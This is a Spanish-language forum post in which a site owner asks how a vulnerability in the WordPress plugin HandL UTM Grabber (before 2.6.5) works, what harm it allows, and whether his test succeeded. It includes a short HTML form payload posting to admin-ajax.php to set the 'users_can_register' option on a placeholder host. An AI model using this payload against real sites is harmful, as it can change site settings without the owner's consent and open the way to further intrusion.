Vulnerabilidad WP plugin HandL UTM Grabber < 2.6.5

Iniciado por LKI, Diciembre 06, 2019, 02:23:05 PM

Tema anterior - Siguiente tema

0 Miembros y 1 Visitante están viendo este tema.

Hola chicos resulta que mi sitio de word press es vulnerable debido al plugin "HandL UTM Grabber V < 2.6.5". Me gustaría comprender esta vulnerabilidad, he leido este artículo: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta y no termino de comprender bien la vulnerabilidad, ¿cuál sería el daño que se puede ocasionar y cómo se llevaría acabo?

He probado ejecutar este código:
Código: php
<html>
<body>
<form action="http://vulnerable-site.com/wp-admin/admin-ajax.php?action=handl_notice_dismiss" method="POST">
<input type="hidden" name="field" value="users_can_register" />
<input type="submit" value="Submit" />
</form>
</body>
</html>


Y mi sitio devuelve un "0". ¿Significaría que el ataque se realizo con éxito? ¿Y ahora que acciones intrusivas podría realizar?


No he encontrado, más información que explique en detalle como llevar a cabo este ataque e información para comprender la vulnerabilidad. Espero que alguien pueda ayudarme.
Saludos.
Ser mejor cada día es mi meta

=LKI=